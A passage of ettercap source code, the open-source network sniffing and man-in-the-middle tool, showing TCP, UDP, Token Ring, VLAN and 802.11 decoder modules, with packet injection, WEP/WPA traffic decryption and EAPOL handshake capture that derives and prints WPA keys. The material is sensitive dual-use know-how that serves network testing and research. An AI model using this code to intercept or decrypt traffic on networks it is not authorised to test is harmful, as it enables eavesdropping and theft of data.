deeper into injectors chain */ EXECUTE_INJECTOR(CHAIN_LINKED, magic); /* * Attach the data (LENGTH was adjusted by LINKED injectors). * Set LENGTH to injectable data len. */ LENGTH = EC_GBL_IFACE->mtu - LENGTH; if (LENGTH > PACKET->DATA.inject_len) LENGTH = PACKET->DATA.inject_len; memcpy(tcp_payload, PACKET->DATA.inject, LENGTH); /* Update inject counter into the session */ status->way[direction].seq_adj += LENGTH; /* Calculate checksum */ PACKET->L4.header = (u_char *)tcph; PACKET->L4.len = sizeof(struct tcp_header); PACKET->DATA.len = LENGTH; tcph->csum = L4_checksum(PACKET); return E_SUCCESS; } /*******************************************/ /* Sessions' stuff for tcp packets */ /* * create the ident for a session */ size_t tcp_create_ident(void **i, struct packet_object *po) { struct tcp_ident *ident; /* allocate the ident for that session */ SAFE_CALLOC(ident, 1, sizeof(struct tcp_ident)); /* the magic */ ident->magic = TCP_MAGIC; /* prepare the ident */ memcpy(&ident->L3_src, &po->L3.src, sizeof(struct ip_addr)); memcpy(&ident->L3_dst, &po->L3.dst, sizeof(struct ip_addr)); ident->L4_src = po->L4.src; ident->L4_dst = po->L4.dst; /* return the ident */ *i = ident; /* return the length of the ident */ return sizeof(struct tcp_ident); } /* * compare two session ident * * return 1 if it matches */ int tcp_match(void *id_sess, void *id_curr) { struct tcp_ident *ids = id_sess; struct tcp_ident *id = id_curr; /* sanity check */ BUG_IF(ids == NULL); BUG_IF(id == NULL); /* * is this ident from our level ? * check the magic ! */ if (ids->magic != id->magic) return 0; /* from source to dest */ if (ids->L4_src == id->L4_src && ids->L4_dst == id->L4_dst && !ip_addr_cmp(&ids->L3_src, &id->L3_src) && !ip_addr_cmp(&ids->L3_dst, &id->L3_dst) ) return 1; /* from dest to source */ if (ids->L4_src == id->L4_dst && ids->L4_dst == id->L4_src && !ip_addr_cmp(&ids->L3_src, &id->L3_dst) && !ip_addr_cmp(&ids->L3_dst, &id->L3_src) ) return 1; return 0; } /* * prepare the ident and the pointer to match function * for a dissector. */ void tcp_create_session(struct ec_session **s, struct packet_object *po) { void *ident; DEBUG_MSG("tcp_create_session"); /* allocate the session */ SAFE_CALLOC(*s, 1, sizeof(struct ec_session)); /* create the ident */ (*s)->ident_len = tcp_create_ident(&ident, po); /* link to the session */ (*s)->ident = ident; /* the matching function */ (*s)->match = &tcp_match; /* alloca of data elements */ SAFE_CALLOC((*s)->data, 1, sizeof(struct tcp_status)); } /* * Find right comunication way for session data. * First array data is relative to the direction first caught. */ int tcp_find_direction(void *ids, void *id) { if (memcmp(ids, id, TCP_IDENT_LEN)) return 1; return 0; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_tr.c000664 000000 000000 00000006620 13711276346 017541 0ustar00rootroot000000 000000 /* ettercap -- TOKEN RING decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct token_ring_header { u_int8 access_control; #define TR_FRAME 0x10 u_int8 frame_control; #define TR_LLC_FRAME 0x40 u_int8 dha[TR_ADDR_LEN]; u_int8 sha[TR_ADDR_LEN]; u_int8 llc_dsap; u_int8 llc_ssap; u_int8 llc_control; u_int8 llc_org_code[3]; u_int16 proto; }; /* encapsulated ethernet */ u_int8 TR_ORG_CODE[3] = {0x00, 0x00, 0x00}; /* protos */ FUNC_DECODER(decode_tr); FUNC_BUILDER(build_tr); FUNC_ALIGNER(align_tr); void tr_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init tr_init(void) { add_decoder(LINK_LAYER, IL_TYPE_TR, decode_tr); add_builder(IL_TYPE_TR, build_tr); add_aligner(IL_TYPE_TR, align_tr); } FUNC_DECODER(decode_tr) { FUNC_DECODER_PTR(next_decoder); struct token_ring_header *tr; DECODED_LEN = sizeof(struct token_ring_header); tr = (struct token_ring_header *)DECODE_DATA; /* org_code != encapsulated ethernet not yet supported */ if (memcmp(tr->llc_org_code, TR_ORG_CODE, 3)) NOT_IMPLEMENTED(); /* fill the packet object with sensitive data */ PACKET->L2.header = (u_char *)DECODE_DATA; PACKET->L2.proto = IL_TYPE_TR; PACKET->L2.len = DECODED_LEN; memcpy(PACKET->L2.src, tr->sha, TR_ADDR_LEN); memcpy(PACKET->L2.dst, tr->dha, TR_ADDR_LEN); /* HOOK POINT : HOOK_PACKET_tr */ hook_point(HOOK_PACKET_TR, po); /* leave the control to the next decoder */ next_decoder = get_decoder(NET_LAYER, ntohs(tr->proto)); EXECUTE_DECODER(next_decoder); /* token ring header does not care about modification of upper layer */ return NULL; } /* * function to create a token ring header */ FUNC_BUILDER(build_tr) { return libnet_autobuild_token_ring( LIBNET_TOKEN_RING_FRAME, LIBNET_TOKEN_RING_LLC_FRAME, /* LLC - Normal buffer */ dst, /* token ring destination */ LIBNET_SAP_SNAP, /* DSAP -> SNAP encap */ LIBNET_SAP_SNAP, /* SSAP -> SNAP encap */ 0x03, /* Unnumbered info/frame */ TR_ORG_CODE, /* Organization Code */ proto, /* protocol type */ l); /* libnet handle */ } /* * alignment function */ FUNC_ALIGNER(align_tr) { return (24 - sizeof(struct token_ring_header)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_udp.c000664 000000 000000 00000014025 13711276346 017702 0ustar00rootroot000000 000000 /* ettercap -- UDP decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ struct udp_header { u_int16 sport; /* source port */ u_int16 dport; /* destination port */ u_int16 ulen; /* udp length */ u_int16 csum; /* udp checksum */ }; /* protos */ FUNC_DECODER(decode_udp); FUNC_INJECTOR(inject_udp); void udp_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init udp_init(void) { add_decoder(PROTO_LAYER, NL_TYPE_UDP, decode_udp); add_injector(CHAIN_ENTRY, NL_TYPE_UDP, inject_udp); } FUNC_DECODER(decode_udp) { FUNC_DECODER_PTR(next_decoder); struct udp_header *udp; u_int16 sum; udp = (struct udp_header *)DECODE_DATA; DECODED_LEN = sizeof(struct udp_header); /* source and dest port */ PACKET->L4.src = udp->sport; PACKET->L4.dst = udp->dport; PACKET->L4.len = DECODED_LEN; PACKET->L4.header = (u_char *)DECODE_DATA; PACKET->L4.options = NULL; /* this is UDP */ PACKET->L4.proto = NL_TYPE_UDP; /* set up the data poiters */ PACKET->DATA.data = ((u_char *)udp) + sizeof(struct udp_header); /* check for bogus len */ if (ntohs(udp->ulen) < (u_int16)sizeof(struct udp_header) || ntohs(udp->ulen) > PACKET->L3.payload_len) return NULL; PACKET->DATA.len = ntohs(udp->ulen) - (u_int16)sizeof(struct udp_header); /* create the buffer to be displayed */ packet_disp_data(PACKET, PACKET->DATA.data, PACKET->DATA.len); /* * if the checsum is wrong, don't parse it (avoid ettercap spotting) * the checksum is should be CSUM_RESULT and not equal to udp->csum ;) * * don't perform the check in unoffensive mode */ if (EC_GBL_CONF->checksum_check) { if (!EC_GBL_OPTIONS->unoffensive && (sum = L4_checksum(PACKET)) != CSUM_RESULT) { char tmp[MAX_ASCII_ADDR_LEN]; #if defined(OS_DARWIN) || defined(OS_WINDOWS) || defined(OS_LINUX) /* * XXX - hugly hack here ! Mac OS X really sux * * Packets transmitted on interfaces with TCP checksum offloading * don't have valid checksums as presented to the machine's packet-capture * mechanism, as those packets are wrapped around internally rather * than being captured after passing through the network interface, as * the OS doesn't bother computing the checksum and adding it to the packet * it leaves that up to the network interface. * (taken from a bug report by Guy Harris - libpcap engineer) * * For Windows at least, TCP checksum off-loading can be disabled with a * registry setting. * * if the source is the ettercap host, don't display the message */ if (ip_addr_is_ours(&PACKET->L3.src) == E_FOUND || ip_addr_is_ours(&PACKET->L3.src) == E_BRIDGE) return NULL; #endif if (EC_GBL_CONF->checksum_warning) USER_MSG("Invalid UDP packet from %s:%d : csum [%#x] should be (%#x)\n", ip_addr_ntoa(&PACKET->L3.src, tmp), ntohs(udp->sport), ntohs(udp->csum), checksum_shouldbe(udp->csum, sum)); return NULL; } } /* HOOK POINT: HOOK_PACKET_UDP */ hook_point(HOOK_PACKET_UDP, po); /* get the next decoder */ next_decoder = get_decoder(APP_LAYER, PL_DEFAULT); EXECUTE_DECODER(next_decoder); /* * in unoffensive mode the filters don't touch * the packet, so we don't have to check here * for unoffensive option */ /* Adjustments after filters */ if ((PACKET->flags & PO_MODIFIED) && (PACKET->flags & PO_FORWARDABLE)) { ORDER_ADD_SHORT(udp->ulen, PACKET->DATA.delta); /* Recalculate checksum */ udp->csum = CSUM_INIT; udp->csum = L4_checksum(PACKET); } return NULL; } /*******************************************/ FUNC_INJECTOR(inject_udp) { struct udp_header *udph; u_char *udp_payload; /* Rember where the payload has to start */ udp_payload = PACKET->packet; /* Allocate stack for tcp header */ PACKET->packet -= sizeof(struct udp_header); /* Create the udp header */ udph = (struct udp_header *)PACKET->packet; udph->sport = PACKET->L4.src; udph->dport = PACKET->L4.dst; udph->csum = CSUM_INIT; /* * Go deeper into injectors chain. * XXX We assume next layer is IP. */ LENGTH += sizeof(struct udp_header); PACKET->session = NULL; EXECUTE_INJECTOR(CHAIN_LINKED, STATELESS_IP_MAGIC); /* * Attach the data (LENGTH was adjusted by LINKED injectors). * Set LENGTH to injectable data len. */ LENGTH = EC_GBL_IFACE->mtu - LENGTH; if (LENGTH > PACKET->DATA.inject_len) LENGTH = PACKET->DATA.inject_len; memcpy(udp_payload, PACKET->DATA.inject, LENGTH); /* Set datagram len and calculate checksum */ PACKET->L4.header = (u_char *)udph; PACKET->L4.len = sizeof(struct udp_header); PACKET->DATA.len = LENGTH; udph->ulen = htons(PACKET->DATA.len + PACKET->L4.len); udph->csum = L4_checksum(PACKET); return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_vlan.c000664 000000 000000 00000003477 13711276346 020063 0ustar00rootroot000000 000000 /* ettercap -- VLAN (802.1q) decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* globals */ struct vlan_header { u_int16 vlan; /* vlan identifier */ u_int16 proto; /* packet type ID field */ }; /* protos */ FUNC_DECODER(decode_vlan); void vlan_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init vlan_init(void) { add_decoder(NET_LAYER, LL_TYPE_VLAN, decode_vlan); } FUNC_DECODER(decode_vlan) { FUNC_DECODER_PTR(next_decoder); struct vlan_header *vlan; DECODED_LEN = sizeof(struct vlan_header); vlan = (struct vlan_header *)DECODE_DATA; /* HOOK POINT : HOOK_PACKET_VLAN */ hook_point(HOOK_PACKET_VLAN, po); po->L2.len += sizeof(struct vlan_header); /* leave the control to the next decoder */ next_decoder = get_decoder(NET_LAYER, ntohs(vlan->proto)); EXECUTE_DECODER(next_decoder); return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_wifi.c000664 000000 000000 00000021250 13711276346 020046 0ustar00rootroot000000 000000 /* ettercap -- 802.11b (wifi) decoder module Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include /* globals */ struct __attribute__ ((__packed__)) wifi_header { u_int8 type; #define WIFI_DATA 0x08 #define WIFI_BACON 0x80 #define WIFI_ACK 0xd4 u_int8 control; #define WIFI_STA_TO_STA 0x00 /* ad hoc mode */ #define WIFI_STA_TO_AP 0x01 #define WIFI_AP_TO_STA 0x02 #define WIFI_AP_TO_AP 0x03 #define WIFI_ENCRYPTED 0x40 u_int16 duration; /* * the following three fields has different meanings * depending on the control value... argh !! * * - WIFI_STA_TO_STA (ad hoc) * ha1 -> dst * ha2 -> src * ha3 -> bssid * - WIFI_STA_TO_AP * ha1 -> bssid * ha2 -> src * ha3 -> dst * - WIFI_AP_TO_AP * ha1 -> rx * ha2 -> tx * ha3 -> dst * ha4 -> src * - WIFI_AP_TO_STA * ha1 -> dst * ha2 -> bssid * ha3 -> src */ u_int8 ha1[ETH_ADDR_LEN]; u_int8 ha2[ETH_ADDR_LEN]; u_int8 ha3[ETH_ADDR_LEN]; u_int16 seq; /* this field is present only if control is WIFI_AP_TO_AP */ /* u_int8 ha4[ETH_ADDR_LEN]; */ /* this field is present only when WIFI_DATA and WIFI_BACON are set (802.11 QoS Data) */ /* u_int6 qos; */ }; struct __attribute__ ((__packed__)) llc_header { u_int8 dsap; u_int8 ssap; u_int8 control; u_int8 org_code[3]; u_int16 proto; }; /* encapsulated ethernet */ static u_int8 WIFI_ORG_CODE[3] = {0x00, 0x00, 0x00}; /* protos */ FUNC_DECODER(decode_wifi); FUNC_ALIGNER(align_wifi); void wifi_init(void); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init wifi_init(void) { add_decoder(LINK_LAYER, IL_TYPE_WIFI, decode_wifi); add_aligner(IL_TYPE_WIFI, align_wifi); } FUNC_DECODER(decode_wifi) { struct wifi_header *wifi = NULL; struct llc_header *llc = NULL; struct wep_header *wep = NULL; struct wpa_header *wpa = NULL; FUNC_DECODER_PTR(next_decoder) = NULL; u_char *wifi_end = NULL; u_char enc_schema; DECODED_LEN = sizeof(struct wifi_header); /* if the packet has an FCS at the end, subtract it to the size of the data to be analyzed */ if ((PACKET->L2.flags & PO_L2_FCS)) { DECODE_DATALEN -= 4; } /* get the ieee802.11 header */ wifi = (struct wifi_header *)DECODE_DATA; wifi_end = (u_char *)wifi + sizeof(struct wifi_header); /* we are interested only in wifi data packets */ if (!(wifi->type & WIFI_DATA)) { DEBUG_MSG("WIFI bacon"); return NULL; } /* * capture only "complete" and not retransmitted packets * we don't want to deal with fragments (0x04) or retransmission (0x08) */ switch (wifi->control & 0x03) { case WIFI_STA_TO_STA: memcpy(PACKET->L2.src, wifi->ha2, ETH_ADDR_LEN); memcpy(PACKET->L2.dst, wifi->ha1, ETH_ADDR_LEN); break; case WIFI_STA_TO_AP: memcpy(PACKET->L2.src, wifi->ha2, ETH_ADDR_LEN); memcpy(PACKET->L2.dst, wifi->ha3, ETH_ADDR_LEN); break; case WIFI_AP_TO_STA: memcpy(PACKET->L2.src, wifi->ha3, ETH_ADDR_LEN); memcpy(PACKET->L2.dst, wifi->ha1, ETH_ADDR_LEN); break; case WIFI_AP_TO_AP: /* there is one more field (ha4) in this case */ memcpy(PACKET->L2.src, (char *)(wifi + 1), ETH_ADDR_LEN); memcpy(PACKET->L2.dst, wifi->ha3, ETH_ADDR_LEN); if (wifi->control & WIFI_ENCRYPTED) { // XXX - implement AP to AP handling in encryption_ccmp DEBUG_MSG("WIFI: encrypted packets (AP to AP) not supported"); return NULL; } /* increase the end of the header accordingly */ wifi_end += ETH_ADDR_LEN; DECODED_LEN += ETH_ADDR_LEN; break; default: return NULL; } /* * if the packet is marked as a BACON, it means that it is a DATA + BACON * used in (802.11 QoS Data) * we have to skip the 2 byte QoS field in the header */ if (wifi->type & WIFI_BACON) { wifi_end += sizeof(u_int16); DECODED_LEN += sizeof(u_int16); } /* * check the type of encryption * the third byte of the IV contains the info */ if (((*(wifi_end + 3) >> 5) & 0x01) == 0x01) { enc_schema = WIFI_WPA; } else { enc_schema = WIFI_WEP; } /* * the frame is encrypted. * check if the provided key is compatible with the schema */ if (wifi->control & WIFI_ENCRYPTED && enc_schema == WIFI_WEP && EC_GBL_WIFI->wifi_schema == WIFI_WEP) { DEBUG_MSG("%s: encrypted packet wep", __FUNCTION__); /* get the WEP header */ wep = (struct wep_header *)wifi_end; DECODED_LEN += sizeof(struct wep_header); if (DECODED_LEN >= DECODE_DATALEN) { return NULL; } if ((DECODE_DATALEN - DECODED_LEN) > UINT16_MAX) { return NULL; } /* decrypt the packet */ if (wep_decrypt((u_char *)wep, DECODE_DATALEN - DECODED_LEN, EC_GBL_WIFI->wkey, EC_GBL_WIFI->wkey_len) != E_SUCCESS) return NULL; /* the wep header was overwritten, remove it from the decoded portion */ DECODED_LEN -= sizeof(struct wep_header); /* remove the encrypted bit from the header since the data are now decrypted */ wifi->control &= ~WIFI_ENCRYPTED; } if (wifi->control & WIFI_ENCRYPTED && enc_schema == WIFI_WPA && EC_GBL_WIFI->wifi_schema == WIFI_WPA) { struct wpa_sa sa; DEBUG_MSG("%s: encrypted packet wpa", __FUNCTION__); /* * get the SA for this STA (search for source or dest mac address) * if we don't have a valid SA there is no way to decrypt the packet. * the SA is calculated from the 4-way handshake into the EAPOL packets */ if (wpa_sess_get(PACKET->L2.src, &sa) == E_SUCCESS || wpa_sess_get(PACKET->L2.dst, &sa) == E_SUCCESS) { /* get the WPA header (CCMP or TKIP initialization vector) */ wpa = (struct wpa_header *)wifi_end; DECODED_LEN += sizeof(struct wpa_header); if (DECODED_LEN >= DECODE_DATALEN) { return NULL; } if ((DECODE_DATALEN - DECODED_LEN) > UINT16_MAX) { return NULL; } /* decrypt the packet */ if (wpa_decrypt((u_char *)wifi, (u_char *)wpa, DECODE_DATALEN - DECODED_LEN, sa) != E_SUCCESS) { return NULL; } /* the wpa header was overwritten, remove it from the decoded portion */ DECODED_LEN -= sizeof(struct wpa_header); /* remove the encryption bit from the header since the data are now decrypted */ wifi->control &= ~WIFI_ENCRYPTED; } } /* if the packet is still encrypted, skip it */ if (wifi->control & WIFI_ENCRYPTED) { return NULL; } /* get the logical link layer header */ llc = (struct llc_header *)wifi_end; DECODED_LEN += sizeof(struct llc_header); /* "Organization Code" different from "Encapsulated Ethernet" not yet supported */ if (memcmp(llc->org_code, WIFI_ORG_CODE, 3)) { return NULL; } /* fill the packet object with sensitive data */ PACKET->L2.header = (u_char *)DECODE_DATA; PACKET->L2.proto = IL_TYPE_WIFI; PACKET->L2.len = DECODED_LEN; /* HOOK POINT: HOOK_PACKET_WIFI */ hook_point(HOOK_PACKET_WIFI, po); /* leave the control to the next decoder */ next_decoder = get_decoder(NET_LAYER, ntohs(llc->proto)); EXECUTE_DECODER(next_decoder); /* no modification to wifi header should be done */ return NULL; } /* * alignment function */ FUNC_ALIGNER(align_wifi) { /* already aligned */ return (32 - sizeof(struct wifi_header) - sizeof(struct llc_header)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/protocols/ec_wifi_eapol.c000664 000000 000000 00000027216 13711276346 021236 0ustar00rootroot000000 000000 /* ettercap -- EAP On Line 802.1x authentication packets for wifi Copyright (C) The Ettercap Dev Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* globals */ #define EAPOL_4WAY_MESSAGE_ZERO 0 #define EAPOL_4WAY_MESSAGE_ONE 1 #define EAPOL_4WAY_MESSAGE_TWO 2 #define EAPOL_4WAY_MESSAGE_THREE 3 #define EAPOL_4WAY_MESSAGE_FOUR 4 #define EAPOL_4WAY_MESSAGE_GROUP 5 /* protos */ FUNC_DECODER(decode_eapol); void eapol_init(void); static int eapol_4way_handshake(struct eapol_key_header *eapol_key); static int eapol_enc_algo(struct eapol_key_header *eapol_key); /*******************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init eapol_init(void) { add_decoder(NET_LAYER, LL_TYPE_8021x, decode_eapol); } FUNC_DECODER(decode_eapol) { struct eapol_header *eapol; struct eapol_key_header *eapol_key; struct rsn_ie_header *rsn_ie; char sta_address[ETH_ASCII_ADDR_LEN]; u_char sta[ETH_ADDR_LEN], bssid[ETH_ADDR_LEN]; int message, algo; struct wpa_sa sa; char tmp[512]; /* don't complain about unused var */ (void) DECODE_DATALEN; /* analyze these only if we have a wpa key */ if (EC_GBL_WIFI->wifi_schema != WIFI_WPA) return NULL; /* get the EAPOL packet */ DECODED_LEN = sizeof(struct eapol_header); eapol = (struct eapol_header *)DECODE_DATA; /* only interested in EAPOL KEY packets */ if (eapol->type != EAPOL_KEY) return NULL; /* get the EAPOL KEY packet */ eapol_key = (struct eapol_key_header *)(eapol + 1); DECODED_LEN += sizeof(struct eapol_key_header) + ntohs(eapol_key->key_data_len); /* only interested in RSN KEY (for CCMP) or WPA KEY (for TKIP) packets */ if (eapol_key->type != EAPOL_KEY_RSN && eapol_key->type != EAPOL_KEY_WPA) return NULL; /* check the encryption algorithm */ algo = eapol_enc_algo(eapol_key); /* check the 4-way handshake message number */ message = eapol_4way_handshake(eapol_key); /* invalid packet */ if (message <= 0) { return NULL; } /* * message 1 and 3 are from the AP * message 2 and 4 are from the STA * group keys come from AP */ if (message == EAPOL_4WAY_MESSAGE_GROUP) { memcpy(sta, PACKET->L2.dst, ETH_ADDR_LEN); memcpy(bssid, PACKET->L2.src, ETH_ADDR_LEN); } if (message % 2) { memcpy(sta, PACKET->L2.dst, ETH_ADDR_LEN); memcpy(bssid, PACKET->L2.src, ETH_ADDR_LEN); } else { memcpy(sta, PACKET->L2.src, ETH_ADDR_LEN); memcpy(bssid, PACKET->L2.dst, ETH_ADDR_LEN); } mac_addr_ntoa(sta, sta_address); /* handle the Group Key message */ if (message == EAPOL_4WAY_MESSAGE_GROUP) { USER_MSG("EAPOL: group key detected...\n"); /* * the group key is encrypted and we need a valid completed sa to decrypt it * the sa must be at state four */ if (wpa_sess_get(sta, &sa) == E_SUCCESS && sa.state == EAPOL_4WAY_MESSAGE_FOUR) { rsn_ie = (struct rsn_ie_header *)(eapol_key + 1); wpa_decrypt_broadcast_key(eapol_key, rsn_ie, &sa); } return NULL; } USER_MSG("EAPOL packet: [%s] 4-way handshake %d [%s]\n", sta_address, message, (algo == WPA_KEY_TKIP) ? "TKIP (WPA)" : "CCMP (WPA2)"); switch (message) { case EAPOL_4WAY_MESSAGE_ONE: /* * On reception of Message 1, the Supplicant determines whether the Key Replay Counter field value has been * used before with the current PMKSA. If the Key Replay Counter field value is less than or equal to the current * local value, the Supplicant discards the message. */ /* save ANonce (from authenticator) to derive the PTK with the SNonce (from the 2 message) */ memcpy(sa.ANonce, eapol_key->key_nonce, WPA_NONCE_LEN); DEBUG_MSG("WPA ANonce : %s", str_tohex(sa.ANonce, WPA_NONCE_LEN, tmp, sizeof(tmp))); /* get the Key Descriptor Version (to select algorithm used in decryption -CCMP or TKIP-) */ sa.algo = algo; /* remember the state of the 4-way handshake */ sa.state = EAPOL_4WAY_MESSAGE_ONE; /* save the status of the SA, overwrite it if it was an old one */ wpa_sess_add(sta, &sa); break; case EAPOL_4WAY_MESSAGE_TWO: /* retrieve the session for this STA and check that the sate is consistent */ if (wpa_sess_get(sta, &sa) != E_SUCCESS || sa.state != EAPOL_4WAY_MESSAGE_ONE) break; /* * On reception of Message 2, the Authenticator checks that the key replay counter corresponds to the * outstanding Message 1. If not, it silently discards the message. * If the calculated MIC does not match the MIC that the Supplicant included in the EAPOL-Key frame, * the Authenticator silently discards Message 2. */ memcpy(sa.SNonce, eapol_key->key_nonce, WPA_NONCE_LEN); DEBUG_MSG("WPA SNonce : %s", str_tohex(sa.SNonce, WPA_NONCE_LEN, tmp, sizeof(tmp))); /* derive the PTK from the BSSID, STA MAC, PMK (WPA-PSK), SNonce, ANonce */ wpa_generate_PTK(bssid, sta, EC_GBL_WIFI->wkey, sa.SNonce, sa.ANonce, (sa.algo == WPA_KEY_TKIP) ? 512 : 384, sa.ptk); DEBUG_MSG("WPA PTK : %s", str_tohex(sa.ptk, WPA_PTK_LEN, tmp, sizeof(tmp))); /* verify the MIC (compare the MIC in the packet included in this message with a MIC calculated with the PTK) */ if (wpa_check_MIC(eapol, eapol_key, DECODED_LEN, sa.ptk, sa.algo) != E_SUCCESS) { USER_MSG("WPA MIC does not match\n"); break; } DEBUG_MSG("WPA MIC : %s", str_tohex(eapol_key->key_MIC, WPA_MICKEY_LEN, tmp, sizeof(tmp))); /* remember the state of the 4-way handshake */ sa.state = EAPOL_4WAY_MESSAGE_TWO; /* save the status of the SA, overwrite it if it was an old one */ wpa_sess_add(sta, &sa); break; case EAPOL_4WAY_MESSAGE_THREE: /* retrieve the session for this STA and check that the sate is consistent */ if (wpa_sess_get(sta, &sa) != E_SUCCESS || sa.state != EAPOL_4WAY_MESSAGE_TWO) break; /* * On reception of Message 3, the Supplicant silently discards the message if the Key Replay Counter field * value has already been used or if the ANonce value in Message 3 differs from the ANonce value in Message 1 * If using WPA2 PSK, message 3 will contain an RSN for the group key (GTK KDE). * In order to properly support decrypting WPA2-PSK packets, we need to parse this to get the group key. */ rsn_ie = (struct rsn_ie_header *)(eapol_key + 1); wpa_decrypt_broadcast_key(eapol_key, rsn_ie, &sa); /* remember the state of the 4-way handshake */ sa.state = EAPOL_4WAY_MESSAGE_THREE; /* save the status of the SA, overwrite it if it was an old one */ wpa_sess_add(sta, &sa); break; case EAPOL_4WAY_MESSAGE_FOUR: /* retrieve the session for this STA and check that the sate is consistent */ if (wpa_sess_get(sta, &sa) != E_SUCCESS || sa.state != EAPOL_4WAY_MESSAGE_THREE) break; /* * On reception of Message 4, the Authenticator verifies that the Key Replay Counter field value is one * that it used on this 4-Way Handshake; if it is not, it silently discards the message. * If the calculated MIC does not match the MIC that the Supplicant included in the EAPOL-Key frame, the * Authenticator silently discards Message 4. */ /* we are done ! just copy the decryption key from PTK */ memcpy(sa.decryption_key, sa.ptk + 32, WPA_DEC_KEY_LEN); USER_MSG("WPA KEY : %s\n", str_tohex(sa.decryption_key, WPA_DEC_KEY_LEN, tmp, sizeof(tmp))); /* remember the state of the 4-way handshake */ sa.state = EAPOL_4WAY_MESSAGE_FOUR; /* save the status of the SA, overwrite it if it was an old one */ wpa_sess_add(sta, &sa); break; } return NULL; } static int eapol_4way_handshake(struct eapol_key_header *eapol_key) { u_int16 key_info = ntohs(eapol_key->key_info); /* IEEE-802.11i-2004 ¤ 8.5.3 */ /* * all the 4-way handshake packets have the pairwise bit set * if not, it is a Group Key, and should be handled in a different way */ if ((key_info & WPA_KEY_PAIRWISE) == 0) { /* Group Key (Sec=0, Mic=0, Ack=1) */ if ((key_info & WPA_KEY_SECURE) == 0 && (key_info & WPA_KEY_MIC) == 0 && (key_info & WPA_KEY_ACK) != 0) { return EAPOL_4WAY_MESSAGE_GROUP; } return -E_NOTHANDLED; } /* message 1: Authenticator->Supplicant (Sec=0, Mic=0, Ack=1, Inst=0, Key=1(pairwise), KeyRSC=0, Nonce=ANonce, MIC=0) */ if ((key_info & WPA_KEY_SECURE) == 0 && (key_info & WPA_KEY_MIC) == 0 && (key_info & WPA_KEY_ACK) != 0 && (key_info & WPA_KEY_INSTALL) == 0) return EAPOL_4WAY_MESSAGE_ONE; /* message 2: Supplicant->Authenticator (Sec=0, Mic=1, Ack=0, Inst=0, Key=1(pairwise), KeyRSC=0, Nonce=SNonce, MIC=MIC(KCK,EAPOL)) * to distinguish between message 2 and 4, check the len of the key_data_len (should be != 0) */ if ((key_info & WPA_KEY_SECURE) == 0 && (key_info & WPA_KEY_MIC) != 0 && (key_info & WPA_KEY_ACK) == 0 && (key_info & WPA_KEY_INSTALL) == 0 && eapol_key->key_data_len != 0) return EAPOL_4WAY_MESSAGE_TWO; /* message 3: * CCMP: Authenticator->Supplicant (Sec=1/0, Mic=1, Ack=1, Inst=1, Key=1(pairwise), KeyRSC=???, Nonce=ANonce, MIC=1) * TKIP: Authenticator->Supplicant (Sec=0, Mic=1, Ack=1, Inst=1, Key=1(pairwise), KeyRSC=???, Nonce=ANonce, MIC=1) */ if ( /* ((key_info & WPA_KEY_TKIP) || (key_info & WPA_KEY_SECURE) != 0) && */ (key_info & WPA_KEY_MIC) != 0 && (key_info & WPA_KEY_ACK) != 0 && (key_info & WPA_KEY_INSTALL) != 0) return EAPOL_4WAY_MESSAGE_THREE; /* message 4: * CCMP: Supplicant->Authenticator (Sec=1/0, Mic=1, Ack=0, Inst=0, Key=1(pairwise), KeyRSC=0, Nonce=0, MIC=MIC(KCK,EAPOL)) * TKIP: Supplicant->Authenticator (Sec=0, 